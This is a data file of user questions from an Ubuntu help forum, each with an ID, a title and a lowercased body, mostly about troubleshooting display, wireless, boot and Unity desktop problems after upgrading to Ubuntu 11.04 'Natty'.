38145	strange unity behaviour in fresh install	after installing natty on my macbook pro - fresh install , not an upgrade . i was happy that almost everything works . however , my second day in , unity is beginning to become more and more flaky . if totally crashed on me once - ( unity not natty - i could still use the apps that were running , just could n't access the launcher or panel ) . sometimes the launcher becomes misaligned with the mouse - it appears higher on the screen like it is shifted upward , you can click it , but the mouse still thinks it is in the same position so you end up opening a different application that the one you click on - frustrating ! a restart fixes this problem - but it has happened twice . also , the top panel has started to show strange check patterns occasionally . i have a picture of the panel , but the forum wo n't let me post it here ... sigh also , sometimes when i enter the search window for applications - i ca n't type into the search box . macbook pro 7-1 typical software installs - shutter , gimp , libreoffice , backintime , wine for firstclass what might cause this - i kind of like unity when it works ... is there something wrong with my graphics setup ? the additional drivers application shows nvidia is installed but 'not in use ' ... .help !
38157	can not upgrade , `` could not download the release notes '' error	here is happening everytime after i click the upgrade button at update manager fyi , my internet connection is ok because my gwibber is always working and giving me the latest tweet and also i can surf well . but the internet connection always suddenly cut whenever i try to upgrade .
38158	wireless does n't work on a dell inspiron 1520	i just installed 11.04 and wireless does n't work . it worked just fine with 10.04.2 lts and 10.10 . the drivers are installed and running ( in use ) all though , as soon as i plug-out the cable , network is gone and no wireless networks are found in range ( normally there are 4-5 networks available in my area so it ca n't be that there 's just none at the moment ) ; do you have any suggestions ?
38159	gnome theme unchangable , gray .	after installation on eee pc 904 with 11.04 , with fully support effect like 3d unity and shadow in border of windows . after some reboot the gnome theme change to the gray , old and unchangeable theme and i ca n't change it from appearance .
38160	moving windows lags after update to natty	i just upgraded my main machine to natty . i have an ati 2600 with the proprietary ati driver . it worked fine with maverick on both 3d games and the compiz desktop . now games still work , but merely moving windows laggs really annoyingly . is there some way to fix this ?
38162	what is a terminal and how do i open and use it ?	what is a terminal ? how do i open a terminal window ? how do i use the terminal ?
38167	how to play music files directly from folders ?	i would love to , while on a given folder , right-click on it and choose play , to play all musics on that folder ( and subfolder if any ) . is there an easy way to achieve this ? thanks a lot
38174	upgrading to ubuntu 11.04 failed	today ubuntu asked me to upgrade to 11.04 . the installation went completely fine until right at the end when the following packages failed : install-info ubuntu-standard the installer hung so i had to shut it down manually . ubuntu still works fine but it says that the upgrade did n't work properly so i am hesitant to restart it until i have resolved the problem in case i ca n't get back in . i am running ubuntu inside the latest version of virtual box and was previously running version 10.10 . i have tried installing install-info manually with apt-get but i get the following error : unhandled exception : [ # < systemstackerror : stack level too deep > ] /usr/local/ruby/lib/ruby/gems/1.9.1/gems/zentest-4.5.0/lib/autotest.rb:842 : in `block in < class : autotest > ' : undefined method `backtrace ' for [ # < systemstackerror : stack level too deep > ] : array ( nomethoderror ) from /usr/local/ruby/lib/ruby/gems/1.9.1/gems/zentest-4.5.0/lib/autotest.rb:828 : in ` [ ] ' from /usr/local/ruby/lib/ruby/gems/1.9.1/gems/zentest-4.5.0/lib/autotest.rb:828 : in `block in hook' from /usr/local/ruby/lib/ruby/gems/1.9.1/gems/zentest-4.5.0/lib/autotest.rb:828 : in `each' from /usr/local/ruby/lib/ruby/gems/1.9.1/gems/zentest-4.5.0/lib/autotest.rb:828 : in `any ? ' from /usr/local/ruby/lib/ruby/gems/1.9.1/gems/zentest-4.5.0/lib/autotest.rb:828 : in `hook' from /usr/local/ruby/lib/ruby/gems/1.9.1/gems/zentest-4.5.0/lib/autotest.rb:344 : in `rescue in run' from /usr/local/ruby/lib/ruby/gems/1.9.1/gems/zentest-4.5.0/lib/autotest.rb:320 : in `run' from /usr/local/ruby/lib/ruby/gems/1.9.1/gems/zentest-4.5.0/lib/autotest.rb:241 : in `run' from /usr/local/ruby/lib/ruby/gems/1.9.1/gems/zentest-4.5.0/bin/autotest:6 : in ` < top ( required ) > ' from /usr/local/ruby/bin/autotest:19 : in `load' from /usr/local/ruby/bin/autotest:19 : in ` < main > ' dpkg : error processing install-info ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of info : info depends on install-info ; however : package install-info is not configured yet . dpkg : error processing info ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of ubuntu-standard : ubuntu-standard depends on info ; however : package info is not configured yet . dpkg : error processing ubuntu-standard ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates it 's a follow-up error from a previous failure . no apport report written because the error message indicates it 's a follow-up error from a previous failure . errors were encountered while processing : install-info info ubuntu-standard e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any ideas on what i should try next ?
38177	how do i install revenge of the titans ?	i 've downloaded the .deb file of revenge of the titans , and installed it using ubuntu software center . now , when i try to launch it using the software launcher nothing happens . any ideas ? the .deb file was downloaded from the humble indie bundle . i am unable to launch it from the terminal ( the command revenge-of-the-titans says command not found ) . i also tried the .tar.gz . when i extract it and run ./revenge.sh , nothing happens . no output on the terminal or anything at all . i have set chmod 777 revenge.sh as well . the command /opt/revengeofthetitans/revenge.sh does not give any output . if i run gedit /opt/revengeofthetitans/revenge.sh in the terminal : > # ! /bin/bash > # > # revenge.sh > # > # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # > > script= '' `basename $ 0` '' > gamedir= '' $ { home } /.revenge_of_the_titans_1.80 '' logfile= '' $ { gamedir } / $ { script } .log '' > instdir= '' `dirname $ 0` '' ; cd > `` $ { instdir } '' ; instdir= '' `pwd` '' > > [ [ ! -d `` $ { gamedir } '' ] ] & & mkdir -m > 0755 `` $ { gamedir } '' > > jarpath= '' patch.jar : revengeofthetitans.jar : data-hib.jar : gfx.jar : fonts.jar : images.jar : music.jar : fx-mono.jar : fx-stereo.jar : gamecommerce.jar : common.jar : spgl-lite.jar : lwjgl.jar : lwjgl_util.jar : jorbis.jar : jinput.jar '' > > # xmodifiers is cleared here to prevent scim screwing up keyboard > input xmodifiers= java \ > -noverify \ > -djava.library.path= '' $ { instdir } '' \ > -dorg.lwjgl.util.nochecks=true \ > -dorg.lwjgl.librarypath= '' $ { instdir } '' \ > -dnet.puppygames.applet.launcher.resources=/resources-hib.dat > \ > -dnet.puppygames.applet.game.gameresource=game.hib > \ > -xx : maxgcpausemillis=3 \ > -xms64m \ > -xmx375m \ > -xincgc \ > -cp `` $ { jarpath } '' \ > net.puppygames.applet.launcher \ > `` $ @ '' \ > > '' $ { logfile } '' 2 > & 1 > > exit 0 > > # > # eof > # > # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
38179	terminal shows menu in panel but window is missing	i upgraded from 10.10 . then everything worked well except very important one -- my terminal . i try to open my terminal , but no any window popup . i press alt+tab and the windows switcher appears in which there is the terminal . i switch to it , however , nothing happens . i can see the word terminal in my top bar . when i move cursor on it i see the file edit view and so on . but they are useless unless i can find my terminal window . i have no problem with chrome , firefox , eclipse , ubuntu software center , pidgin and many more applications . but without terminal , i 'm using a disabled linux .
38180	how do i keep my alternate cd upgrade from using the network ?	i 'm running an upgrade from maverick to natty from a mounted 'alternate ' iso , but it 's current status is `` fetching file 1444 of 1703 at 55.1 kb/s '' . i 'm pretty sure it 's trying to use the network for the `` getting new packages '' phase . how can i make sure it uses only the iso , and not the network ? disconnecting the network ( or keeping it disconnected the entire time ) just results in stalling ( waiting , not freezing ) during the `` getting new packages '' phase . i 've followed the instructions on the ubuntu wiki for upgrading using the alternate cd iso mounted as a drive . also , i selected `` no '' to the question about updating packages during the upgrade . if this is a bug , please give a link with the bug number or tell me that i should file a bug .
38184	is it better to install ubuntu as a windows application or dual boot ?	i went to the ubuntu website and saw that you can either download ubuntu and install it as a dual boot operating system or install it as a windows application using wubi . i was wondering , what are the advantages and disadvantages of using either ? also which one is preferred and better ? thanks !
38192	pros and cons of unity desktop environment	i have just upgraded to 11.04 that is why wanted to know your opinions about pros and cons of unity desktop environment . thank you
38193	seeing the weather again in the `` current time bar '' on ubuntu 11.04	ok , so until now i was able to see the current weather in my city directly in the top panel , included in the time bar . however , with the update this is no longer possible . is there a way to restore this ? thank you : )
38196	changing effects in compiz causes problems with the top panel	every time i change effects in compiz my top bar gets screwed and i have to log out and log in again . is it normal ? ca n't install simple compiz config manager . is it normal ?
38197	laptop with hybrid graphics . problem with drivers	i 've just installed ubuntu 10.04 lts . after booting , system recommended me some drivers for my graphic card ( nvidia gt 325m ) . after installation and reboot all i see is black screen . recovery mode gives the same effect . i have windows 7 on the same machine . how can i repair ( delete drivers ? ) ? i 'm linux newbie so please , be simple . i also would like to ask is there some working solution for hybrid graphic on ubuntu ? i 've read some info on the internet but have n't found any solution and nvidia says they will not provide support for linux with their hybrid graphics technology .
38198	hp laserjet p1005 stopped working after upgrade	i have a problem that 's been bugging me since ubuntu 11.04 beta 2 : my printer ( a hp laserjet p1005 ) have been installed and working in ubuntu 10.10 . after upgrading to ubuntu 11.04 beta 1 , it still worked , but after receiving updates from that point on , it never printed a single sheet ever since ( ? ... ! ! ! ) it 's displayed as set up , working and ready to print , but hitting the print button does absolutely nothing . it wo n't even print at test page . this problem goes for both of my laptops . upgrading to the final version of natty did n't help either . since i saw no printer icon on that damn , not configurable top bar ( pardon my french here ! ) , i tried logging on to ubuntu classic ... . same . i even tried plugging in a different printer ... . that did n't work either . i 'm starting to get really desperate here . i seriously do n't want to go back to windows , but what are the options if my hardware wo n't play along ? ? please , please , please , help me out here ! i 'll be in great debt to anyone who can give that magic piece of advice that 'll make my printer do its thing again ! ! ! !
38201	grub problem with windows 7	i just installed ubuntu 11.04 on my computer , that was already running windows7 perfectly fine . windows is on /dev/sda3 and ubuntu on /dev/sda6 - same hdd , but different partitions . the problem is right now when i boot it goes into grub and i can choose : ubuntu memtest86 windows7 but when i click windows7 it return to grub again . please help me , i really need this working .
38202	how upgrade ubuntu from console ?	i would like to upgrade from 10.10 to 11.04 but from the console . how can i do this ? thanks in advance .
38205	minimal install xubuntu	how would i be able to perform a minimal install of xubuntu for a powerpc ? my computer can not read dvd 's , and the xubuntu iso file is 744mb ( i ca n't burn it to a cd ) . is it possible to burn it to a cd ?
38206	any way to get vmware fusion 's shared folders working with 11.04/natty guest ?	just upgraded to natty this morning . i know , i should have waited until vmware updated fusion for it , but i was impatient . : - ) i ca n't seem to get shared folders working now ... anybody have this working , and if so , what 's the trick ?
38217	`` fixing recursive fault but reboot is needed '' error	i am running a 64bit laptop and i am trying to install ubuntu 11.04 from both a usb and cd . however , when i click either install from disk or try ubuntu i get to a black screen with this : fixing recursive fault but reboot is needed any ideas ?
38222	unity bar auto-hide behaviour and application icons placement	the first issue : it seems that sometimes when i hover to the left edge of the screen the unity bar will not stay on top of other windows even if i continue to hover the cursor above it , at other times it will stay on top . is this a normal behaviour ? or am i affected by some bug / inconsistency ? if it 's normal , what 's the logic behind it ? the second issue : application icons for running applications do not maintain their position in the unity bar but instead move around according to some weird rules ( if any ? ) that i ca n't understand . is this to be expected , or is it a bug ? is there a way to force them to stop moving around ? i like to see certain apps in certain positions and this bothers me .
38226	emerald does n't work anymore ?	is emerald just gone forever for 11.04 users ? , does it work with kubuntu or xubuntu ?
38227	compiz crashes using ubuntu classic and unity	after having upgraded to natty i got some serious issues with compiz : using a filter for the decoration-plugin like i did before upgrading without any problems , leads compiz to crash . this is how my filter look like : ( title=terminalondesktop ) instead of the standard value any . that must be a bug . any ideas how to work around ? this seems to be a compiz bug and maybe comes along with the other problems like this : moving windows lags after update to natty there is a bug report for this problem , please vote ! compiz effects slow and laggy on natty with ati card
38236	desktop sharing in empathy in 11.04 disabled when chatting with empathy in 10.04 ?	a friend of mine has been using ubuntu 10.04 . because he has some newer hardware , i recommended that he upgrade from 10.04 to 11.04 , which fixes some issues . i 'm still using ubuntu 10.04 , and we typically use the screen sharing feature in empathy to allow me to remotely log into his machine and fix things when needed . unfortunately , now that he 's upgraded , it seems that , when he chats with me using empathy , it disables the `` share my desktop '' menu item on his end . however , when i use 11.04 , the `` share my desktop '' option is enabled , and works as expected . furthermore , when i 'm in 10.04 and he is in 11.04 , i can invite him to share my desktop , and this also works as expected . from a user 's perspective , then , it seems that the upgrade from empathy in 10.04 to 11.04 broke backwards compatibility between the screen sharing feature of these two versions of empathy , such that the newer version can not invite the older version to share the newer version 's desktop . is this expected behaviour , or is it a bug ? can anyone recommend a workaround , other than resorting to an alternate desktop sharing client like teamviewer ? i posted a bug report on this issue here : https : //bugs.launchpad.net/ubuntu/+source/empathy/+bug/775682
38237	how to setup qt creator to compile windows executables ?	the version of qt creator that ships in the repos . can compile linux executables out of the box . however , it seems like some configuration is necessary to get it to compile windows applications . i have the mingw32 toolchain installed , and i have access to a windows build of the qt libraries . what steps do i need to take to make this work ?
38238	thunderbird says my inbox is 80 % full ; isp says no limit . what gives ?	thunderbird has been reporting that i 'm using 81 % of my inbox quota , but my isp says i have no inbox quota . one of them is wrong . how do i go about figuring out who ?
38239	missing of gnome-panel applets after upgrade	after the upgrade to natty i am missing various applets for the gnome-panel . thy do not appear in the âťadd to panelâť dialog although they are probably installed . these do i miss : netspeed tomboy sensor-applet gnome-powermanager ( to avoid power saving mode ) and some others more that 's so annoying ! does anyone know how to get them running ? it would also interesting if someone else has this issue , please tell..
38240	launcher icons revert to default upon login	every time i log in , i get the same default icons despite having removed them and added new ones ( by right-clicking on apps like skype and pressing `` keep in launcher '' ) . i hope i have explained my problem thoroughly - i am an ubuntun00b . is this just a bug and is it fixable , or am i missing something here ?
38241	twinview : how to enable vsync ?	how to enable vsync on a second monitor under twinview ?
38246	how can i resize my partition ?	there are a few other questions here with a similar title , i followed the steps in each one but i 'm still unable to resize my ubuntu 11.04 partition using gparted . when i right click on sda1 , and choose resize , i am unable to add space to the partition , only subtract . my apologies should this be closed due to being so similar to the other like questions .
38248	dv6000 wireless card wont turn on in 11.04	0 down vote favorite share [ fb ] share [ tw ] just installed 11.04 beta 2 on my hp dv6000 laptop with broadcom wireless . drivers are installed and system says they are `` currently in use '' but i ca n't get wireless to turn on or connect , in 10.10 it did it automatically . is there a way to turn it on that i 'm just missing because of new system ? i just copied and pasted some one who has the same problem as
38254	how to disable `` on mouse stop auto click ''	when the mouse stops moving after 1 seconds , it auto clicks , no matter if it is within an application or on desktop . does anyone knows how to disable this feature ?
38255	gui problems in ubuntu 11.04 using 'ubuntu classic ( no effects ) '	i have seen some questions like this but i thought i might be able to provide more detail . i recently installed ubuntu 11.04 and wiped 10.10 . since my old built-in graphics card is incapable of 3d acceleration , i tried using ubuntu classic . after logging in , i was greeted by a choppy background and flickering menus . ( i have never had this problem in ubuntu 10.10 ) . so i even tried logging in using ubuntu classic ( no effects ) , the screen was much better this time , but the panels were a little messed up and it crashed on me several times after a few minutes . i have a pentium 4 2.66 ghz . 1.5gb ram . built in graphics intel extreme graphics 2 96mb memory ( i think it 's shared not built in memory ) . is it a problem with my graphics card or driver ? please help .
38256	external monitor ubuntu 11.04 64 bit not working	just installed ubuntu 11.04 , but can not get my external monitor to work in `` same image in all monitors '' mode . its only possible to choose same resolution for the external monitor as for the laptop . external is 1920*1080 , laptop 1200*800px when mirror is selected , ubuntu identifies both monitors as `` laptop '' and both monitored displays 1200*800px . any help much appreciated ...
38262	why do i get two icons in lower panel for each application running ?	i just upgraded to 12.04 . now i get two icons in the lower gnome panel for every application that 's open . i am using gnome without effects . the problem started when i switched from a two monitor configuration to a single monitor configuration . ( i disabled the internal graphic output of my laptop with the nvidia-settings program )
38264	monitor displays signal out of range until the graphical interface is loaded after installing	when the computer is booting all i get is the error message displayed by the monitor . i need to be able to choose the os during startup however . i 'm using a 1024x768 on this monitor , though it maxes at 1280x1024 or something like that . i 've tried commenting the /etc/default/grub file in the grub_gfxmode=640x480 line but that did n't work . also , when i press ctrl + alt + f1-6 to access the cli without the gui i get that error as well . i 've read here that pressing ctrl + alt + '+ ' or '- ' in the numpad could change the resolution but i get nothing . i 've also installed startupmanager as advised in the link . none of the configuration options in it seem to make any difference . i 'm using xubuntu though i do n't think that has anything to do with it . nevermind . i edited the resolution to 1024x768 for grub2 and it worked . i do n't understand why 640x480 did n't , but it 's working so . i was going to put it in the answers but i ca n't . i 'll come back later and do it .
38268	how to properly play .mkv files ?	i am having a problem while playing .mkv files . every time i play a .mkv file , the audio can be heard but video can not be seen . the only way to see the video if i actually right click on it or put a window in front of it and it displays one part of the video but not all . the link of the picture above basically describes what i am saying . while i was trying to take the screenshot , the window for the screenshot disappeared and displayed part of the video . i hope someone could help me on this . thank you ! edit : i was running unity 2d when i have the problem but when i run unity 3d , it works . so i need to make this work on 2d . please help .
38271	dconf-editor gone from repositories ?	on this post : how can i configure unity ? it mentions several options for unity that need to be accessed through dconf-editor . i remember when i used ubuntu natty beta on virtualbox , it was there in the repositories ... but now i have it installed on my machine for real , and i ca n't find it in synaptic ! what 's more , i looked on packages.ubuntu.com for it as well , and still found nothing ! why was this pulled ? is this a bug ? how would i report a bug like that ? etc. , etc . all in all , is there a way to modify these settings still , or will dconf-editor be back in the repositories soon ?
38279	wireless does n't work on a broadcom bcm4311	i have an hp pavilion dv6000 laptop . the wifi worked perfectly when i had 10.10 installed , the system says that the driver is installed and activated but i ca n't get the wifi to connect or turn on . it was all pretty much `` automatic '' when i was running 10.10 . 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 )
38281	disabling smart disk utility warning message	the disk utility pop-up the same message so many times and too many at a time . the message is the same `` hard disk problem detected . a hard disk is reporting health problems . '' the hard disk has previous bad sectors and s.m.a.r.t . ran out of allocated resource to replace them . the hard disk it still usable ( being using it with 10.10 for half a year without any problem . how can i turn off this annoying pop up .
38283	desktop is stretched across dual monitors	i just upgraded to ubuntu 11.04 and my system is setup for dual monitors . when i logged in i noticed my desktop icons looks very strange , as if they were being stretched . i could not click on them either . i finally discovered that if i turn off my second monitor that the desktop displays correctly and i can click on the icons again . when i turn on the second monitor , ubuntu is stretching the desktop across both monitors . the icons are not placed in the correct location and therefore i am not able to click on them . is there any way to correct this ? thank you for your time .
38285	where can i find out what features are getting added to the dash ?	i 'm curious what features are coming down the pipe for the new dash feature in unity . where should i be looking for a blog or rss to follow ? in particular , i 'm wondering if they are going to add support for searching chrome/firefox bookmarks and empathy contacts . edit : there is a lens proposal for the later
38287	can not log into unity with nvidia-current	i just installed natty from scratch . if i use the nvidia-current driver , i can not login . the unity bar loads on the left , but the status area never comes up and the ui never becomes responsive . if i downgrade to nvidia-173 , i am able to log in . the only problem i seem to have with nvidia-173 is that if i switch to the tty ( ctrl+alt+f1 ) and switch back , the graphics are horribly corrupted . the applications re-draw but the backgroud is permanently corrupted . any ideas on the issue ? lspci output for my card : 05:00.0 vga compatible controller : nvidia corporation g71 [ geforce 7300 gs ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : evga.com . corp. device c437 flags : bus master , fast devsel , latency 0 , irq 18 memory at fa000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at fb000000 ( 64-bit , non-prefetchable ) [ size=16m ] [ virtual ] expansion rom at fc000000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : nvidia kernel modules : nvidia-current , nvidia-173 , nouveau , nvidiafb
38294	fetching all software center reviews ?	when you select an item in the software center its user reviews are fetched , and saved . is there a way to fetch the reviews for all items in the software center ?
38296	unity launcher about : config does not show anything	i wanted to change the launcher size on ubuntu 11.04 . i pressed super ( win ) key , and typed about : config , selected the unity icon , but nothing happened . after that , i tried the same again , but this time the unity icon doesnt even appear in the result . what might be wrong ?
38299	what happened to the quick desktop button ?	in 10.10 in the task bar there was a button that minimized all windows . now that there is no task bar ( bummer ) the button is gone ( double bummer ) anyone know how to get it back ? the button or the taskbar . thanks .
38301	dual booting debian squeeze & ubuntu natty : should i share /home and/or other partitions ?	there are two prior questions that tangentially touch on this here & here . it 's not really what i 'm after though . i plan on installing debian squeeze & ubuntu natty in a dual-boot scenario . in both cases i 'll be using amd64 builds . there are obvious similarities between these distros and i wonder if i can leverage this to my advantage in some way . i also wonder if these similarities will cause me any foreseeable problems , perhaps with grub2 , .bashrc , etc . specifically , i wonder if it 's advisable to share the /home partition . packages will in general be more bleeding edge with natty . will this cause problems with configuration files that reside in /home ? while i 'm at it , i may as well ask : does it matter which distro i install first ? are there any other directories that could be shared - not just for the sake of being tricky , but because it would be advantageous to do so ? i assume i can safely share the swap partition . suppose sharing /home is n't a good idea then i 'm left with one-too-many primary partitions : / [ debian ; ext4 ] /home [ debian ; ext4 ] / [ ubuntu ; ext4 ] /home [ ubuntu ; ext4 ] swap [ debian/ubuntu ] do i overcome this by using swap files ? or should i use extended partitions ? cheers .
38303	multitouch gestures - maverick - > natty upgrade	i 'm using a lenovo t410 . i upgraded from maverick to natty . utouch did n't get installed , so i installed it with aptitude . the only gesture i have working is two finger scrolling , which was active prior to installing utouch . none of the other gestures do anything . what am i missing ? i 'm pretty sure the laptop supports multitouch .
38304	missing math symbols in libreoffice/openoffice	i 've had this problem for about six months , but i have n't been able to find a solution . when viewing documents with writer or presentation containing math symbols/fonts , some of the symbols are either replaced with question marks or just left blank . the integral symbol is an example . i can post some documents or system output for example if that would be helpful . i recently upgraded to natty x64 ( with packaged libreoffice ) , but i 've had this issue with maverick x64 & openoffice as well . i 've downloaded msttcorefonts and cleared my font cache . for what it 's worth , i also did a clean install for natty . thanks for any help !
38308	kde or upgrade ?	i want to upgrade my home desktop to narwal and switch from gnome to kde . what should i do first ? if i switch to kde first , i will have to install old kde , then upgrade it to newer , and kde is known not to like it . if i upgrade first , i will get all this gnome3 and unity stuff , which i need not and do n't want .
38309	how to fix ubuntu classic on 11.04 ?	when i change from unity to the classic desktop , the panels are there including unity . is there a way to fix and remove unity from classic desktop ? thank you .
38310	will unity offer more keyboard configuration ?	i want my cake and to eat it too . and in linux i can usually do that . ( and it 's free cake ! ) i 'm a little shocked that it has n't been easier ( or as far as i know , even possible ) to change the keyboard shortcuts for unity . someone suggested in another post that the unity launcher can be changed from super to ctrl + super , then i can map the other keybindings that i want . but i like a lot of the features that unity has with only pressing the super key ( i find it a lot easier to press super+e than ctrl+super+e ) . however , i want to be able to change what some of the bindings in unity are , primarily change super+t from opening trash to opening a terminal ( currently ctrl+alt+t ) . with that background , here is my question : is unity working on allowing users to customize the keybindings to their preference ?
38312	ca n't compile matplotlib on ubuntu 11.04 / ft2build.h : no such file or directory	i 'm trying to build matplotlib from source but it is n't working . it seems this thing was a part of x11 , and since ubuntu is now using wayland that screwed things up , i think . anyway to fix this ? oh , ok . i just had to install libfreetype6 and libfreetype6-dev with apt-get . i ca n't answer it now so i 'll edit it later or something .
38321	installed unity 2d on 11.04 , not showing in the login screen ?	downloaded & installed 11.04 and because i do n't have 3d graphics , i thought i would try unity 2d . installed it from the software centre , logged out , when logging back in i do n't have the option to use unity 2d as it 's not listed at the login session ?
38324	is there a feature like alt + tab for groups ?	if you have ever used cmd + tab on os x you know what i 'm looking for . this is actually one of the few features of os x i love . i 'm using compiz and in the static application switcher i have set it so i can switch between applications in the same group using alt + ~ . i 've looked through all the different plugins and have searched around on the internet but have n't been able to find anything that lets me switch between the groups . something that lets me hit alt + tab and it 'll pop up only one option for all the open apps . is there any way to do this ? edit : i use gnome3/shell at work and have noticed that gnome3 implements this feature . would be nice if we could get it in unity , too . : )
38326	automatic unlocking of keyring ?	i like the idea of gnome-keyring , but having it ask for the unlock password after every startup kinda defeats the purpose . if i log in with my password i already authenticated myself . can i make gnome-keyring unlock automatically on login ? ( i know this lessens the security and it 's a completely conscious decision ) .
38327	how can i get broadcom bcm4311 wireless working ?	wireless was worked perfectly in ubuntu 10.10 . now i upgraded it to ubuntu 11.04 . after this upgrade wireless is not working in my laptop , even `` wireless connection '' is not showing in network connection list . what i have to do for this ? lspci output : 06:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 )
38329	system refuses to boot at the first attempt	everyone . after the upgrade to natty my system started to refuse booting at the first attempt . more details : on the grub menu i 'm trying to start ubuntu and this causes errors : error : file not found error : you need to load the kernel first push any key to proceed then grub menu shows up again . after some attempts to start the error messages do n't appear and system boots up normally . that happens every time . fdisk -l output : /dev/sda1 * 1 10199 81922016+ 7 hpfs/ntfs /dev/sda2 10199 30402 162276352 f w95 extended ( lba ) /dev/sda5 10200 10759 4498168+ 82 linux swap / solaris /dev/sda6 15623 30402 118714368 83 linux /dev/sda7 10760 14771 32225280 83 linux /dev/sda8 14772 15622 6834176 83 linux the / directory ( /dev/sda7 ) is formatted as reiserfs . any idea how to resolve this issue ?
38331	how to change default launcher icons in unity for a new user ?	i have customised my unity launcher 's icon list with custom launchers . now i want the same customised launcher to appear when i create a new user . currently the default ubuntu launcher appears when i create a new user . how do i do that ?
38333	display pixilates when external monitor is attached	just upgraded to 11.04 and loving it . however , when i boot the acer aspire 5100 laptop with external vga monitor plugged in , or when i attach it after boot , both screens pixilate and i ca n't see a thing . unplugging the monitor does n't help and i have to reboot . it works perfectly if the external monitor is never attached happens regardless of gnome or unity used . maybe a driver thing ? worked perfectly in 10.10 any help would be much appreciated ! i 'm using : acer aspire 5100 ati radeon xpress 200m graphics external monitor connected by vga .
38336	how do i recover my data from an encrypted home directory ?	i have a big problem . when i made a upgrade from 10.10 to 11.04 i lost all my data in home directory . i have only data from my home encrypted directory . what can i do ? thanks martin
38337	can i install unity 2d and 3d at the same time ?	just for kicks , is it possible to install both unity 2d and unity 3d at the same time without breaking either one of them ? what 's the difference , anyway ? 2d ( qt ) vs 3d ( gtk2 ) ?
38343	dreamweaver alternative in ubuntu ?	i had been using dreamweaver in windows . recently i shifted to ubuntu , there i cant find any good alternative to dreamweaver . so i decided to use firebug but its good for editing css , javascript . i dont find it useful for editing html ( in place ) . 1 . is there any way that can enable inplace editing of text in local webpages ? the problem i faced with firebug is that i am unable to save the edited css files or js files . 2 . is there any way that can enable saving of edited data in firebug ? edit 1 : if i rename a site in dreamweaver it updates other pages which involve link to that site . is it available in any software ?
38344	i installed ubuntu 11.04 beta 1 and updated every day . should i do a final version fresh install ?	i installed ubuntu 11.04 beta 1 ( fresh install ) and since then , i updated it every day . now it seems pretty stable , but i do n't know if the updated ubuntu beta is as stable as a fresh install installation . should i wipe the partition and do a fresh install from the final version ?
38345	wallpaper is broken and mouse pointer is inconsistant	i 've got natty running on a desktop for my parents to use . everything 's going fairly smoothly , but ... the wallpaper is broken . it 's just a light grey , and when i go to change it , i get weird black and white polygons behind windows for a little while . the pointer is being silly , for lack of a better word . i 've selected the large `` redglass '' pointer theme because my dad has low vision , but the pointer is inconsistent . on the desktop , launcher , panel etc , it 's the default white one , but in firefox and libreoffice , itâs the large red theme . any help appreciated .
38346	unity 3.8.12 release date	i like to keep a tab on the development progress of unity on launchpad . currently i am running unity 3.8.10 on natty . on launchpad it shows that unity 3.8.12 `` 0day-sru '' was released like 3 days ago . however i have not got this update yet . i am eagerly waiting for it as it fixes many bugs that i face while using unity . why am i not getting the update ? also what does `` oday-sru '' mean ?
38349	where is the `` open with ... '' option in ubuntu 11.04 ?	i do n't seem to have the `` open with ... '' option when right clicking things in ubuntu 11.4 , like a .desktop extension for example , any ideas on how to fix this ?
38351	are there metacity themes for unity ?	any resources/collections/repositories for unity themes ? is there any chance is metacity themes will be supported , at least in terms of window controls and window borders ?
38362	why ca n't i hear the login sound ?	i am running ubuntu 11.04 natty and just noticed that i do n't hear any login sounds . i checked the sound preferences and it shows that the ubuntu sound theme is selected . also in the startup applications the gnome login sound is present . this can be seen below . is this a bug ? are the login sounds included with natty ? if there are no sounds , can i remove it from the startup applications ?
38363	how can i turn down the sensitivity of my volume slider	i 'm on a laptop and i have a touch sensitive volume control slider thing which works in ubuntu but is way too sensitive , a tiny little stroke and its either at full volume or nothing . is there a way of changing its sensitivity ? i 'm on an hp6715b laptop if that makes any difference .
38367	how do i debug when the system freezes or when it crashes back to login ?	i am fairly new to ubuntu and i was wonder what a good way is to debug when something crashes ? for example : i installed 11.04 and the default media player banshee makes my laptop crash after a few minutes of playing music . since the system completely freezes and there is not error message it 's hard to find out what is wrong . second problem i have is that sometimes the system crashes to login . i am suspecting it to be a chromium or flash but i am not 100 % sure . so anybody got some tips on how to debug stuff like this ?
38370	auto-hiding gnome panel should be always on top -- which gconf key to use ?	i 've set my panels to auto-hide and want them to be on top of everything once they scroll out . which gconf-key do i have to use to achieve this ? also i looked for a list of gconf keys -- somebody knows ? cheers , t
38371	my taskbar does n't show up after startup	just upgraded to natty . this is the first time i turned on my computer to use it . it did n't show anything but my wallpaper . no side panel or taskbar . just the wallpaper . now , i sort of know what happened ( i played around with the appearances a little ) . *can anyone give me the commands to open the login setting as well as appearance in order to change my settings to normal ? * note : i did n't install anything . just changed some settings to the login screen for it not to show up or something close to that . i would love to show you all the evidence but i 'm posting this via cell phone . please help me ! i know how to open terminal it 's the programming i need help with . thanks !
38375	how do i enlarge the mouse pointer/cursor ?	in ubuntu 10.10 i could enlarge the mouse pointer . in ubuntu 11.04 i can not find the option .
38379	after natty 11.04 installation system wo n't boot	my notebook is an acer extensa 2902lmi with following components : pentium m 715 intel 855pm chipset intel pro/wireless 2200bg ati mobility radeon 9700 64 vram 512mb ram i run ubuntu 10.04 lts for month without any problems on my notebook . now i want to upgrade to ubuntu 11.04 . i booted from the ubuntu 11.04 livecd without any problems . everything was working stable . so i decided to install ubuntu 11.04 to my harddisk . the installation process run without any problems too . but after installation was finished and the reboot came , the system hangs after grub was loaded with a black screen an the flashing cursor in the top left corner . when i choose recovery mode in grub i get some pages with logs scrolling very fast and ended with `` fixing recursive fault but reboot is needed ! '' if i add `` acpi=off '' to grub , the system starts and i can use unity as well . but now i do n't have acpi features and my wireless card is not detected , too . so anybody now what the problem could be ?
